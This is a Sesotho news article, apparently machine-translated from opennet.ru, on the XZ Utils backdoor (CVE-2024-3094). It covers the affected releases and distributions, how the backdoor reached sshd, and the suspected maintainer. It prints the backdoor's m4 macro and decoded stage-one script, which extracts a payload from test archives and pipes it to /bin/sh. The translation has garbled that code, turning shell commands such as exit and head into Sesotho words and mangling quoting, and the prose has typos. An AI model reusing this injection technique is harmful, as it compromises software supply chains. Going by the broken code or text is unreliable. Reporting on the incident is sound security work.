Ka har'a sephutheloana sa XZ Utils, se kenyeletsang laeborari ea liblzma le lisebelisoa tsa ho sebetsa ka data e hatelitsoeng ka mokhoa oa ".xz", "backdoor" (CVE-2024-3094) e khethiloe e lumellang ho thibela le ho fetoloa ha data e sebetsitsoeng ke lits'ebetso tse amanang. le laeborari ea liblzma. Sepheo se seholo sa backdoor ke seva sa OpenSSH, seo kabong e 'ngoe se kopantsoeng le laeborari ea libsystemd, eo le eona e sebelisang liblzma. Ho hokahanya sshd le laeborari e tlokotsing ho lumella bahlaseli ho fihlella seva sa SSH ntle le netefatso.
The backdoor e ne e le teng tokollong ea semmuso ea 5.6.0 le 5.6.1, e phatlalalitsoeng ka Hlakola 24 le la 9 Hlakubele, e ileng ea khona ho kena kabong le polokelong ea polokelo, mohlala, Gentoo, Arch Linux, Debian sid/unstable, Fedora Rawhide le 40-beta, feme ea openSUSE le tumbleweed, LibreELEC, Alpine edge, Solus, NixOS e sa tsitsang, OpenIndiana, OpenMandriva rolling, pkgsrc current, Slackware hona joale, tlhahlobo ea Manjaro. Basebelisi bohle ba lintlafatso tsa xz 5.6.0 le 5.6.1 ba khothaletsoa ho khutlela ho mofuta oa 5.4.6 ka potlako.
Har'a lintlha tse fokotsang bothata, ho ka hlokomeloa hore mofuta oa liblzma o nang le monyako o ka morao ha oa khona ho ba karolo ea likhatiso tse tsitsitseng tsa kabo e kholo, empa e amme openSUSE Tumbleweed le Fedora 40-beta. Arch Linux le Gentoo ba sebelisitse mofuta o tlokotsing oa zx, empa ha ba hlaseloe habonolo hobane ha ba sebelise patch ea systemd-notify ho openssh, e etsang hore sshd e hokahane le liblzma. Monyako o ka morao o ama feela lits'ebetso tsa x86_64 tse thehiloeng ho Linux kernel le laeborari ea Glibc C.
Khoutu ea ts'ebetso ea backdoor e ne e patiloe ka m4 macros ho tloha ho build-to-host.m4 faele e sebelisoang ke automake toolkit ha ho hahoa. Nakong ea kopano, nakong ea ts'ebetso ea ts'ebetso e rarahaneng e sa bonahaleng e thehiloeng ho li-archives (bad-3-corrupt_lzma2.xz, good-large_compressed.lzma), e sebelisetsoang ho hlahloba ho nepahala ha ts'ebetso, ho ile ha hlahisoa faele ea ntho e nang le khoutu e kotsi, e kenyellelitsoeng ho laeborari ea liblzma mme e fetotse mohopolo oa ts'ebetso e meng ea mesebetsi ea eona. Li-macros tsa m4 tse kenyang monyako o ka morao li kenyelelitsoe ho li-tarball tsa tokollo, empa li ne li le sieo polokelong ea Git. Ka nako e ts'oanang, li-archives tsa liteko tse kotsi li ne li le teng sebakeng sa polokelo, i.e. motho ea kentseng ts'ebetso ea backdoor o na le phihlello ea polokelo le lits'ebetso tsa tlhahiso ea tokollo.
Ha o sebelisa liblzma lits'ebetsong, liphetoho tse mpe li ka sebelisoa ho thibela kapa ho fetola data, kapa ho ama ts'ebetso ea sshd. Haholo-holo, khoutu e khopo e ile ea senya mosebetsi oa RSA_public_decrypt ho feta ts'ebetso ea netefatso ea sshd. Monyako o ka morao o ne o kenyelletsa tshireletso hore o se ke wa fumanwa mme o ne o sa iponahatse ha maemo a LANG le TERM a ne a setwa (ke hore, ha o ne o etsa tshebetso ho theminale) le LD_DEBUG le LD_PROFILE maemo a tikoloho a ne a sa hlophiswa, mme e ne e kentswe tshebetsong feela ha ho sebetswa /usr/sbin/sshd faele e sebetsang. Kamore e ka morao e ne e boetse e na le mokhoa oa ho bona ts'ebetso libakeng tsa debug.
Haholo-holo, faele ea m4/build-to-host.m4 e sebelisitsoeng gl_am_configmake=`grep -aErls “#{4}[[:alnum:]]{5}#{4}$” $srcdir/ 2>/dev / null` … gl_[$1]_config='sed \»r\n\» $gl_am_configmake | eval $gl_path_mapa | $gl_[$1]_prefix -d 2>/dev/null'
Mohahong oa pele, ts'ebetso ea grep e ile ea fumana liteko tsa faele / lifaele/bad-3-corrupt_lzma2.xz, eo, ha e sa phutholoha, e hlahisitseng mongolo: ####Hello#### #345U211267$^D330^W [ ! $(uname) = "Linux" ] && tsoa 0 [ ! $(uname) = "Linux" ] && tsoa 0 [ ! $(uname) = "Linux" ] && tsoa 0 [ ! $(uname) = "Linux" ] && tsoa 0 [ ! $(uname) = "Linux" ] && tsoa 0 eval `grep ^srcdir= config.status` haeba teko -f ../../config.status;ebe eval `grep ^srcdir= ../../config .status` srcdir = "../../$srcdir» fi export i=»((hlooho -c +1024 >/dev/null) && hlooho -c +2048 && (hlooho -c +1024 >/dev/ null) && hlooho -c +2048 && (hlooho -c +1024 >/dev/null) && hlooho -c +2048 && (hlooho -c +1024 >/dev/null) && hlooho -c +2048 && (hlooho - c +1024 >/dev/null) && hlooho -c +2048 && (hlooho -c +1024 >/dev/null) && hlooho -c +2048 && (hlooho -c +1024 >/dev/null) && hlooho - c +2048 && (hlooho -c +1024 >/dev/null) && hlooho -c +2048 && (hlooho -c +1024 >/dev/null) && hlooho -c +2048 && (hlooho -c +1024 >/ dev/null) && hlooho -c +2048 && (hlooho -c +1024 >/dev/null) && hlooho -c +2048 && (hlooho -c +1024 >/dev/null) && hlooho -c +2048 && ( hlooho -c +1024 >/dev/null) && hlooho -c +2048 && (hlooho -c +1024 >/dev/null) && hlooho -c +2048 && (hlooho -c +1024 >/dev/null) && hlooho -c +2048 && (hlooho -c +1024 >/dev/null) && hlooho -c +2048 && (hlooho -c +1024 >/dev/null) && hlooho -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13 \50-\113" "\0-\377")|xz -F e tala —lzma1 -dc|/bin/sh ####Lefatshe####
Hore na bahlaseli ba khonne ho fumana mekhoa ea motheo ea morero oa xz joang ha e e-s'o hlakisoe ka botlalo. Hape ha e e-so hlake hore na ke basebelisi ba bakae le merero e ileng ea senyeha ka lebaka la backdoor. Mongoli ea qosoang oa backdoor (JiaT75 - Jia Tan), ea kentseng li-archive tse nang le khoutu e mpe sebakeng sa polokelo, o ngollana le bahlahisi ba Fedora mme a romella likopo tsa ho hula ho Debian tse amanang le phetoho ea phepelo lekaleng la xz 5.6.0, mme ha a ka a etsa joalo. tsosa lipelaelo, kaha o nkile karolo ho xz esale a nts'etsapele lilemo tse peli tse fetileng mme ke moqapi oa bobeli ho latela palo ea liphetoho tse entsoeng. Ntle le projeke ea xz, mongoli ea belaelloang oa backdoor le eena o kentse letsoho ntlafatsong ea liphutheloana tsa xz-java le xz tse kentsoeng. Ho feta moo, Jia Tan matsatsing a 'maloa a fetileng e kenyelelitsoe palo ea bahlokomeli ba morero oa XZ Embedded o sebelisitsoeng ho Linux kernel.
Phetoho e mpe e ile ea fumanoa kamora ho sekaseka ts'ebeliso e feteletseng ea CPU le liphoso tse hlahisitsoeng ke valgrind ha o hokela ka ssh ho lits'ebetso tse thehiloeng ho Debian. Hoa hlokomeleha hore tokollo ea xz 5.6.1 e kenyelelitse liphetoho tse lokiselitsoeng ke mongoli ea belaelloang oa backdoor ho arabela litletlebo mabapi le ho fokotseha ha sshd le likotsi tse hlahileng kamora ho ntlafatsoa ho mofuta oa zx 5.6.0 ka backdoor. Ho feta moo, selemong se fetileng Jia Tan o ile a etsa liphetoho tse neng li sa lumellane le "-fsanitize=address" mokhoa oa ho hlahloba, e leng se ileng sa etsa hore e holofale nakong ea tlhahlobo ea fuzz.
Source: opennet.ru